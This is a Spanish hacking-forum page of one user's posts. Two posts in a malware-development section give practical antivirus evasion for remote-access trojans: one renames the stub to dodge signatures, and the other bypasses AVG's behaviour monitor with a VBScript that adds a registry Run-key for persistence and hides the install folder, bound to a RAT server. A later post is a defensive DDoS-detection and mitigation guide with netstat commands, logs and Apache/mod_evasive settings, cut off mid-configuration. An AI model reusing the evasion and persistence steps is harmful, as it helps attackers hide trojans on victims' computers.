Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Cronos

Páginas 1 ... 22 23 24 25 26
#461
Desarrollo y modificación de malwares / [TIP] Sacar Firma "Mal_Poison3" de Trend y Otras Mas
Julio 29, 2011, 02:45:11 PM
Bueno, el tip es el siguiente,cuando vaya a compilar el Stub,no lo llames ni:

-Stub.exe
-Stb.exe
-Stub.dll
-Server.exe
-Ni Similares.

Llamalo por ejemplo "Calculadora.exe",si estais haciendo una mod ya compilada,pues Reshacker,y lo cambiais.

Autor: k0ws

Saludos,, Cronos.-
#462
Desarrollo y modificación de malwares / Bypass AVG Identity Protection [By geminis_demon]
Julio 29, 2011, 01:23:32 PM
AVG Identity Protection es un modulo que trae incorporado el AVG Antivirus 2011, tanto la versión gratuita como las de pago.

Como dice la descripción que veis en la imagen, este modulo lo que hace es analizar el comportamiento de los ejecutables en busca de movimientos sospechosos, eso significa que aunque vuestro server esté fud será detectado al ejecutarlo y posteriormente eliminado.

¿Y que hay que hacer para burlar esta protección? Pues configurar nuestro server de forma que no se comporte como un troyano.

Pondré el ejemplo con Spy-Net pero funciona con cualquier RAT. Para que funcione tenéis que dejar marcadas las opciones como las veis en la imagen:

Fijaros bien que en el directorio de instalación puse este signo: <
Eso es porque los direcctorios de instalación que hay para elegir son detectados por AVG como "Movimiento sospechoso", entonces, al poner ese signo que no está permitido en los nombres de carpetas, el server se instalará automaticamente en la carpeta %APPDATA%.

Ahora lo que aremos sera abrir el notepad y pegar este texto:


Código:
set indetectable = createobject("wscript.shell")
indetectable.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Ru n\PRUEBA" , "%APPDATA%\PRUEBA\PRUEBA.exe" , "REG_EXPAND_SZ"
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login "attrib +r +s +h %APPDATA%\PRUEBA" , VbHide
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login "attrib +r +s +h %APPDATA%\PRUEBA\*.*" , VbHide

Y lo guardamos como "autoinicio.vbs". Este archivo lo hace es ocultar nuestro server y agregarlo al registro de windows para que se inicie con el sistema, ahora lo unimos al server así:

Y con esto conseguimos bypassear el AVG Identity Protection. 

NOTA: Donde pone "PRUEBA" podéis poner lo que queráis pero recordar que la carpeta donde se instala el server tendréis que ponerla también en el archivo .vbs

Saludos,, Cronos.-
#463
Seguridad / Re:Proteger tu web ante un ataque DDOS
Julio 23, 2011, 09:47:43 PM
Uhh seme pifio la fuente.. Es de Taringa! ;)
Saludos,, Cronos.-
#464
Seguridad / Proteger tu web ante un ataque DDOS
Julio 23, 2011, 09:37:37 PM
Intentando detener un DDoS

Porque un null-route a una ip no es una solución, es una chapuza.
Si unos script-kiddies están DDoSeando tu web.....

1) Se basa en ataques reales.
2) No hay nada de teoría, solo parte práctica.

A) Detectando el ataque
1) Usando el comando netstat

Código: php
netstat -an | grep :80 | sort


Código: php
netstat -n -p | grep SYN_REC | awk '{print $5}' | awk -F: '{print $1}'


Código: php
netstat -n -p|grep SYN_REC | wc -l


Código: php
netstat -lpn|grep :80 |awk '{print $5}'|sort


Código: php
netstat -an | grep :80 | awk '{ print $5 }' | awk -F: '{ print $1 }' | sort | uniq -c | sort -n


Ejemplo de ataque SYN_RECV o SYN Flooding al Apache (puerto 80).

192.168.0.3 es la ip del servidor apache y 192.168.0.105 es la ip del "atacante".

Código: php
tcp        0      0 192.168.0.3:80          192.168.0.5:60808     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60761     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60876     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60946     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60763     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60955     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60765     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60961     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60923     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61336     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61011     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60911     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60758     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60828     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61114     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61074     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60826     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60959     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60900     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60940     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60920     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60825     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60945     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60913     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61009     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60755     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60904     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61583     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60910     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60915     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60827     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61458     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60908     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61007     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60927     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60951     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60942     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61113     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60909     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60822     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60894     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60952     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60928     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60936     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60906     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61466     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60919     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60914     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60926     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60939     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60931     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60831     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60823     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60954     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60916     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60963     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60947     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61006     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60933     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60950     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60895     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60917     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61480     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60935     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60960     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60767     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60918     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60821     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61077     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60905     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61517     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60893     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60953     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60903     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61439     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61337     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61545     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61299     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61010     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60930     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60744     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60929     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60754     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61008     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61116     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60811     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60807     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60938     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60764     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60873     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60817     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61550     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60748     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60956     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60753     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61115     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60741     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61075     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60948     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60829     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60943     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61338     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60762     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60824     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60830     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61535     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60898     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60815     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60962     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60957     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60944     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60921     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60759     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60897     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61518     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60958     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60922     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60937     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60875     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60766     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60751     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60768     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60743     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:61076     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60912     SYN_RECV   
tcp        0      0 192.168.0.3:80          192.168.0.5:60816     SYN_RECV


Claro ejemplo de SYN Attack al Apache.

2) Mirando el server-status del Apache

Si miramos el server-status del apache veremos conexiones en estado "Reading" ("R" Reading Request).

El problema es que cuando el número de conexiones "Reading" llena el "MaxClients" del Apache no acepta nuevas peticiones, por lo que los nuevos clientes, aunque sean legítimos, no serán aceptados.

Podemos aumentar el valor del "MaxClients" para que no se llene la cola de peticiones y acepte a todos los clientes, sean atacantes o no.

Otra buena medida es bajar el valor del "Timeout" del Apache para que las peticiones "Reading" sean "matadas" rápidamente, antes que pueda llenarse el MaxClients a su tope.

Para aumentar el MaxClients en el Apache 2 basta con añadir la directiva:

ServerLimit 350 antes de MaxClients y ya dejará.

<IfModule prefork.c>
[..]
ServerLimit 500
MaxClients 450
[..]
</IfModule>

3) Mirando los logs del mod_evasive

CitarJun 22 18:24:04 lan mod_evasive[3835]: Blacklisting address 82.228.169.50: possible attack.
Jun 22 18:24:45 lan mod_evasive[3600]: Blacklisting address 81.206.164.163: possible attack.
Jun 22 18:25:46 lan mod_evasive[3589]: Blacklisting address 155.232.250.19: possible attack.
Jun 22 18:27:23 lan mod_evasive[3671]: Blacklisting address 83.227.217.2: possible attack.
Jun 22 18:28:10 lan mod_evasive[3673]: Blacklisting address 68.187.171.89: possible attack.
Jun 22 18:29:57 lan mod_evasive[3605]: Blacklisting address 70.143.2.130: possible attack.
Jun 22 18:30:45 lan mod_evasive[3803]: Blacklisting address 69.157.93.88: possible attack.
Jun 22 18:31:45 lan mod_evasive[10397]: Blacklisting address 146.64.81.22: possible attack.
Jun 22 18:35:01 lan mod_evasive[3794]: Blacklisting address 66.38.192.134: possible attack.
Jun 22 18:35:15 lan mod_evasive[3553]: Blacklisting address 81.190.204.64: possible attack.
Jun 22 18:40:10 lan mod_evasive[16602]: Blacklisting address 64.231.39.129: possible attack.
Jun 22 18:48:04 lan mod_evasive[16479]: Blacklisting address 84.99.195.100: possible attack.
Jun 22 18:48:12 lan mod_evasive[16467]: Blacklisting address 201.0.10.142: possible attack.
Jun 22 18:52:57 lan mod_evasive[16573]: Blacklisting address 219.95.39.242: possible attack.
Jun 22 18:53:07 lan mod_evasive[16534]: Blacklisting address 86.129.3.91: possible attack.
Jun 22 18:53:26 lan mod_evasive[16527]: Blacklisting address 62.254.0.32: possible attack.
Jun 22 18:54:41 lan mod_evasive[30473]: Blacklisting address 24.196.199.191: possible attack.
Jun 22 18:55:17 lan mod_evasive[30520]: Blacklisting address 142.161.157.227: possible attack.
Jun 22 18:55:24 lan mod_evasive[30461]: Blacklisting address 65.92.145.133: possible attack.
Jun 22 18:55:33 lan mod_evasive[30509]: Blacklisting address 88.111.227.200: possible attack.
Jun 22 18:56:13 lan mod_evasive[30473]: Blacklisting address 69.199.94.227: possible attack.
Jun 22 18:57:45 lan mod_evasive[30517]: Blacklisting address 86.125.135.212: possible attack.
Jun 22 18:57:54 lan mod_evasive[30479]: Blacklisting address 84.192.141.65: possible attack.
Jun 22 18:58:46 lan mod_evasive[30527]: Blacklisting address 83.140.97.106: possible attack.
Jun 22 18:59:31 lan mod_evasive[30469]: Blacklisting address 82.173.216.196: possible attack.
Jun 22 19:00:33 lan mod_evasive[30517]: Blacklisting address 80.176.157.245: possible attack.
Jun 22 19:00:38 lan mod_evasive[30470]: Blacklisting address 86.133.102.51: possible attack.
Jun 22 19:01:35 lan mod_evasive[30870]: Blacklisting address 24.42.134.253: possible attack.
Jun 22 19:01:48 lan mod_evasive[30509]: Blacklisting address 62.254.0.34: possible attack.
Jun 22 19:02:57 lan mod_evasive[31009]: Blacklisting address 81.227.219.125: possible attack.
Jun 22 19:03:29 lan mod_evasive[31056]: Blacklisting address 172.209.173.153: possible attack.
Jun 22 19:05:07 lan mod_evasive[31385]: Blacklisting address 84.6.12.110: possible attack.
Jun 22 19:06:52 lan mod_evasive[31008]: Blacklisting address 85.227.144.249: possible attack.
Jun 22 19:06:56 lan mod_evasive[31263]: Blacklisting address 213.222.156.222: possible attack.
Jun 22 19:07:13 lan mod_evasive[31393]: Blacklisting address 62.163.143.166: possible attack.
Jun 22 19:07:37 lan mod_evasive[31021]: Blacklisting address 62.135.101.73: possible attack.
Jun 22 19:08:03 lan mod_evasive[31251]: Blacklisting address 82.201.249.69: possible attack.
Jun 22 19:08:17 lan mod_evasive[31200]: Blacklisting address 81.62.65.53: possible attack.
Jun 22 19:11:04 lan mod_evasive[31263]: Blacklisting address 82.39.148.204: possible attack.
Jun 22 19:12:37 lan mod_evasive[31241]: Blacklisting address 213.222.154.13: possible attack.
Jun 22 19:13:54 lan mod_evasive[31027]: Blacklisting address 81.51.79.4: possible attack.
Jun 22 19:24:04 lan mod_evasive[31041]: Blacklisting address 84.221.118.156: possible attack.
Jun 22 19:48:47 lan mod_evasive[3400]: Blacklisting address 62.135.101.192: possible attack.
Jun 22 19:53:04 lan mod_evasive[31031]: Blacklisting address 62.30.33.13: possible attack.
Jun 22 19:54:32 lan mod_evasive[31016]: Blacklisting address 72.14.194.18: possible attack.
Jun 22 19:56:10 lan mod_evasive[31067]: Blacklisting address 198.96.34.58: possible attack.
Jun 22 20:03:24 lan mod_evasive[5144]: Blacklisting address 172.213.33.242: possible attack.
Jun 22 20:08:31 lan mod_evasive[5137]: Blacklisting address 83.241.11.16: possible attack.
Jun 22 20:21:59 lan mod_evasive[6645]: Blacklisting address 201.23.193.20: possible attack.
Jun 22 20:32:28 lan mod_evasive[7801]: Blacklisting address 212.38.134.172: possible attack.
Jun 22 20:45:46 lan mod_evasive[7836]: Blacklisting address 81.247.11.48: possible attack.
Jun 22 20:48:03 lan mod_evasive[7796]: Blacklisting address 70.245.98.186: possible attack.
Jun 22 20:49:38 lan mod_evasive[7832]: Blacklisting address 61.8.138.203: possible attack.
Jun 22 20:51:21 lan mod_evasive[7801]: Blacklisting address 201.132.197.161: possible attack.
Jun 22 20:57:18 lan mod_evasive[10426]: Blacklisting address 82.201.249.67: possible attack.
Jun 22 20:57:51 lan mod_evasive[7822]: Blacklisting address 81.77.26.162: possible attack.
Jun 22 21:00:25 lan mod_evasive[7817]: Blacklisting address 200.39.202.243: possible attack.
Jun 22 21:12:04 lan mod_evasive[7794]: Blacklisting address 84.27.139.25: possible attack.
Jun 22 21:22:27 lan mod_evasive[7816]: Blacklisting address 217.208.98.254: possible attack.

Si es un DDoS muy distribuido enseguida notaremos que muchas ip's diferente DoSean el Apache.

4) Mirando los logs del syslog (del kernel)

CitarMay 17 13:39:01 lan kernel: possible SYN flooding on port 80. Sending cookies.
May 17 13:39:02 lan kernel: ip_conntrack: table full, dropping packet.
May 17 13:39:35 lan kernel: NET: 4 messages suppressed.
May 17 13:39:35 lan kernel: ip_conntrack: table full, dropping packet.
May 17 13:39:38 lan kernel: NET: 1 messages suppressed.
May 17 13:39:38 lan kernel: ip_conntrack: table full, dropping packet.
May 17 13:39:43 lan kernel: NET: 6 messages suppressed.
May 17 13:39:43 lan kernel: ip_conntrack: table full, dropping packet.
May 17 13:39:48 lan kernel: NET: 4 messages suppressed.
May 17 13:39:48 lan kernel: ip_conntrack: table full, dropping packet.
May 17 13:39:52 lan kernel: NET: 9 messages suppressed.
May 17 13:39:52 lan kernel: ip_conntrack: table full, dropping packet.
May 17 13:39:57 lan kernel: NET: 15 messages suppressed.
May 17 13:39:57 lan kernel: ip_conntrack: table full, dropping packet.
May 17 13:40:01 lan kernel: possible SYN flooding on port 80. Sending cookies.

Líneas a mirar:

Citarpossible SYN flooding on port 80. Sending cookies.
"Sending Cookies" si lo tenemos activado en el /etc/sysctl.conf
# Enable TCP SYN Cookie Protection

Código: php
net.ipv4.tcp_syncookies = 1


A veces es mejor deshabilitarlo:

Código: php
net.ipv4.tcp_syncookies = 0


De esta manera podemos ver las ip's del ataque:

CitarJul 14 12:46:50 lan kernel: TCP: drop open request from 80.171.45.81/63069
Jul 14 12:46:55 lan kernel: NET: 1401 messages suppressed.
Jul 14 12:46:55 lan kernel: TCP: drop open request from 80.103.166.148/4403
Jul 14 12:46:59 lan kernel: NET: 1772 messages suppressed.
Jul 14 12:46:59 lan kernel: TCP: drop open request from 200.127.62.215/4019
Jul 14 12:47:05 lan kernel: NET: 2362 messages suppressed.
Jul 14 12:47:05 lan kernel: TCP: drop open request from 85.57.169.142/19899
Jul 14 12:47:11 lan kernel: NET: 2618 messages suppressed.
Jul 14 12:47:11 lan kernel: TCP: drop open request from 83.19.73.122/2710
Jul 14 12:47:14 lan kernel: NET: 898 messages suppressed.
Jul 14 12:47:14 lan kernel: TCP: drop open request from 80.235.39.64/3554
Jul 14 12:47:19 lan kernel: NET: 1120 messages suppressed.
Jul 14 12:47:19 lan kernel: TCP: drop open request from 80.171.45.81/62095
Jul 14 12:47:24 lan kernel: NET: 1714 messages suppressed.
Jul 14 12:47:24 lan kernel: TCP: drop open request from 84.62.152.44/34014
Jul 14 12:47:29 lan kernel: NET: 2274 messages suppressed.
Jul 14 12:47:29 lan kernel: TCP: drop open request from 200.127.62.215/3207
Jul 14 12:47:34 lan kernel: NET: 1552 messages suppressed.
Jul 14 12:47:34 lan kernel: TCP: drop open request from 80.103.166.148/4797
Jul 14 12:47:39 lan kernel: NET: 4044 messages suppressed.
Jul 14 12:47:39 lan kernel: TCP: drop open request from 80.235.39.64/2678
Jul 14 12:47:44 lan kernel: NET: 4360 messages suppressed.
Jul 14 12:47:44 lan kernel: TCP: drop open request from 80.103.166.148/1312
Jul 14 13:04:15 lan kernel: TCP: drop open request from 200.14.237.83/4787
Jul 14 13:04:22 lan kernel: NET: 147 messages suppressed.
Jul 14 13:04:22 lan kernel: TCP: drop open request from 81.38.172.161/4892
Jul 14 13:04:30 lan kernel: NET: 6 messages suppressed.
Jul 14 13:04:30 lan kernel: TCP: drop open request from 200.14.237.83/4934
Jul 14 13:04:30 lan kernel: TCP: drop open request from 200.14.237.83/4935
Jul 14 13:04:38 lan kernel: NET: 76 messages suppressed.
Jul 14 13:04:38 lan kernel: TCP: drop open request from 81.84.212.34/2861
Jul 14 13:04:40 lan kernel: NET: 269 messages suppressed.
Jul 14 13:04:40 lan kernel: TCP: drop open request from 200.14.237.83/3070
Jul 14 13:04:45 lan kernel: NET: 287 messages suppressed.
Jul 14 13:04:45 lan kernel: TCP: drop open request from 81.203.228.102/4400
Jul 14 13:04:50 lan kernel: NET: 98 messages suppressed.
Jul 14 13:04:50 lan kernel: TCP: drop open request from 81.84.212.34/3961
Jul 14 13:04:54 lan kernel: NET: 245 messages suppressed.
Jul 14 13:04:54 lan kernel: TCP: drop open request from 200.84.169.200/1183
Jul 14 13:05:00 lan kernel: NET: 1787 messages suppressed.
Jul 14 13:05:00 lan kernel: TCP: drop open request from 81.203.228.102/2050
Jul 14 13:05:04 lan kernel: NET: 3208 messages suppressed.
Jul 14 13:05:04 lan kernel: TCP: drop open request from 86.212.167.27/4720
Jul 14 13:05:09 lan kernel: NET: 2031 messages suppressed.
Jul 14 13:05:09 lan kernel: TCP: drop open request from 81.203.228.102/1794
Jul 14 13:05:14 lan kernel: NET: 2221 messages suppressed.
Jul 14 13:05:14 lan kernel: TCP: drop open request from 81.38.172.161/4908
Jul 14 13:05:21 lan kernel: NET: 730 messages suppressed.
Jul 14 13:05:21 lan kernel: TCP: drop open request from 81.203.228.102/1430
Jul 14 13:05:25 lan kernel: NET: 234 messages suppressed.
Jul 14 13:05:25 lan kernel: TCP: drop open request from 81.203.228.102/2939
Jul 14 13:05:30 lan kernel: NET: 1594 messages suppressed.
Jul 14 13:05:30 lan kernel: TCP: drop open request from 200.14.237.83/3876
Jul 14 13:05:36 lan kernel: NET: 633 messages suppressed.
Jul 14 13:05:36 lan kernel: TCP: drop open request from 86.212.167.27/1116
Jul 14 13:05:39 lan kernel: NET: 970 messages suppressed.
Jul 14 13:05:39 lan kernel: TCP: drop open request from 81.38.172.161/3040
Jul 14 13:05:45 lan kernel: NET: 548 messages suppressed.
Jul 14 13:05:45 lan kernel: TCP: drop open request from 81.203.228.102/2119
Jul 14 13:05:50 lan kernel: NET: 421 messages suppressed.
Jul 14 13:05:50 lan kernel: TCP: drop open request from 81.203.228.102/2478
Jul 14 13:05:56 lan kernel: NET: 379 messages suppressed.
Jul 14 13:05:56 lan kernel: TCP: drop open request from 81.203.228.102/4005
Jul 14 13:05:59 lan kernel: NET: 891 messages suppressed.
Jul 14 13:05:59 lan kernel: TCP: drop open request from 81.38.172.161/3568
Jul 14 13:06:04 lan kernel: NET: 2221 messages suppressed.
Jul 14 13:06:04 lan kernel: TCP: drop open request from 81.203.228.102/4532
Jul 14 13:06:09 lan kernel: NET: 243 messages suppressed.
Jul 14 13:06:09 lan kernel: TCP: drop open request from 81.203.228.102/1939
Jul 14 13:06:14 lan kernel: NET: 2166 messages suppressed.
Jul 14 13:06:14 lan kernel: TCP: drop open request from 81.38.172.161/2137
Jul 14 13:06:19 lan kernel: NET: 2071 messages suppressed.
Jul 14 13:06:19 lan kernel: TCP: drop open request from 81.38.172.161/3136
Jul 14 13:06:24 lan kernel: NET: 2069 messages suppressed.
Jul 14 13:06:24 lan kernel: TCP: drop open request from 81.84.212.34/4600
Jul 14 13:06:29 lan kernel: NET: 1797 messages suppressed.
Jul 14 13:06:29 lan kernel: TCP: drop open request from 86.212.167.27/3171
Jul 14 13:06:35 lan kernel: NET: 1292 messages suppressed.
Jul 14 13:06:35 lan kernel: TCP: drop open request from 81.203.228.102/1394
Jul 14 13:06:39 lan kernel: NET: 715 messages suppressed.

CitarMay 17 14:13:24 lan kernel: ip_conntrack: table full, dropping packet.
Tabla llena. Tenemos un problema porque no admitiremos más conexiones aunque sean legítimas.

Podemos aumentar el valor de dicha tabla si nuestra red da para más.
Directamente:

Código: php
echo "65535" > /proc/sys/net/ipv4/ip_conntrack_max


Para que el valor quede guardardo y no se pierda al reiniciar, debemos añadirlo en el sysctl.conf

Código: php
net.ipv4.ip_conntrack_max = 65535


Recuerda reiniciar la red para aplicar los cambios en el /proc (service network restart).
Paquetes Marcianos:

CitarAug 31 12:41:29 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 12:45:07 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 12:52:57 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 12:58:55 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 13:08:12 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 13:12:03 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 13:34:38 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 13:37:38 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 13:52:42 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 13:56:18 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 13:59:54 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 14:13:32 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 14:38:08 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 14:43:42 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 14:50:05 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 14:51:05 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 14:57:58 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 15:05:27 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 15:06:14 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0
Aug 31 15:09:08 lan kernel: martian source 192.168.0.10 from 0.0.0.0, on dev eth0

Son paquetes inesperados que llegan por un camino por el cual no pueden llegar indica algún problema de audacia (cracker).

Usando paquetes como éstos se pueden atacar vulnerabilidades remotas en stacks TCP/IP

5) Mirando las gráficas del MRTG, RRDtool

Si ves que el tráfico inbound sube hasta los 100mbps es que te están doseando hehehe.





B) Intentar parar el ataque

1) - mod_evasive

Web Oficial:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Consideramos que 50 conexiones por segundo a 2 páginas es suficiente motivo como para bloquear esa ip:

Código: php
<IfModule mod_evasive.c>
    DOSHashTableSize    3097
    DOSPageCount        2
    DOSSiteCount        50
    DOSPageInterval     1
    DOSSiteInterval     1
    DOSBlockingPeriod   900
</IfModule>


Igual que el anterior pero con 50 peticiones en un segundo a 1 sola página:

Código: php
<IfModule mod_evasive.c>
 DOSHashTableSize 3097
 DOSPageCount 1
